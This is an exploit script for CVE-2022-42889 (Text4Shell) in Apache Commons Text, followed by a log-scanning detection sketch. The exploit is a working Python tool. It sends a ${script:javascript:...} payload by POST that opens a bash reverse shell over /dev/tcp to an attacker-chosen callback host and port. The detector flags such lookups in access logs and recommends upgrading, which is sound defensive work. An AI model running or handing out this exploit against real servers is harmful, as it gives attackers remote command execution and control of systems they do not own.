```python
# Exploit Title: Apache Commons Text 1.10.0 - Remote Code Execution (Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link: https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text < 1.10.0
# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
# CVE: CVE-2022-42889
# Type: Remote Code Execution (RCE)
# Method: POST request, script interpolator
# Notes: This exploit demonstrates an RCE vector via POST data, differing from common GET-based payloads.
#!/usr/bin/env python3
import urllib.parse
import http.client
import sys


def usage():
    print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
    print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
    sys.exit(1)


if len(sys.argv) != 4:
    usage()

target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]

raw_payload = (
    f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
    f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)
encoded_payload = urllib.parse.quote(raw_payload)
path = f"/?data={encoded_payload}"  # modify the parameter according to your target

print(f"[!] Remember to modify the parameter according to your target")
print(f"[+] Target: http://{target_ip}{path}")
print(f"[+] Payload (decoded): {raw_payload}")

conn = http.client.HTTPConnection(target_ip, 80)
conn.request("POST", path, body="", headers={
    "Host": target_ip,
    "Content-Type": "application/json",
    "Content-Length": "0"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
print(response.read().decode())
conn.close()
```
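The script above sends a POST with an empty body and carries the `${script:...}` string percent-encoded in the URL query string, so the request target recorded in a web access log is enough to spot it whatever the HTTP method. The following detection sketch is an added example, not part of the original exploit or of any Apache project code; the combined-log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Lookup prefixes named in the CVE-2022-42889 advisory (script, dns, url).
# Matched case-insensitively to be conservative.
LOOKUP_RE = re.compile(r"\$\{(script|dns|url):", re.IGNORECASE)
# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return (method, lookup) if the request target holds a risky lookup, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    hit = LOOKUP_RE.search(fully_decode(m.group("target")))
    return (m.group("method"), hit.group(1).lower()) if hit else None


def scan(lines):
    """Return [(line_number, method, lookup), ...] for every flagged line."""
    return [(n, *r) for n, line in enumerate(lines, 1) if (r := scan_line(line))]


# Constructed sample lines: documentation addresses, inert lookup bodies.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Apr/2025:10:00:01 +0000] "GET /?data=hello HTTP/1.1" 200 12',
    '203.0.113.7 - - [17/Apr/2025:10:00:02 +0000] "POST /?data=%24%7Bscript%3Ajavascript%3A1%2B1%7D HTTP/1.1" 200 12',
    '203.0.113.9 - - [17/Apr/2025:10:00:03 +0000] "GET /?data=%2524%257Bdns%253Aaddress%257Cexample.test%257D HTTP/1.1" 200 12',
    '203.0.113.9 - - [17/Apr/2025:10:00:04 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for lineno, method, lookup in scan(SAMPLE_LOG):
        print(f"line {lineno}: {method} request carries a ${{{lookup}:...}} lookup")
```

Access logs do not record request bodies, so a payload sent in the body needs the same pattern applied at a WAF or in application logging; upgrading to Commons Text 1.10.0 or later remains the fix.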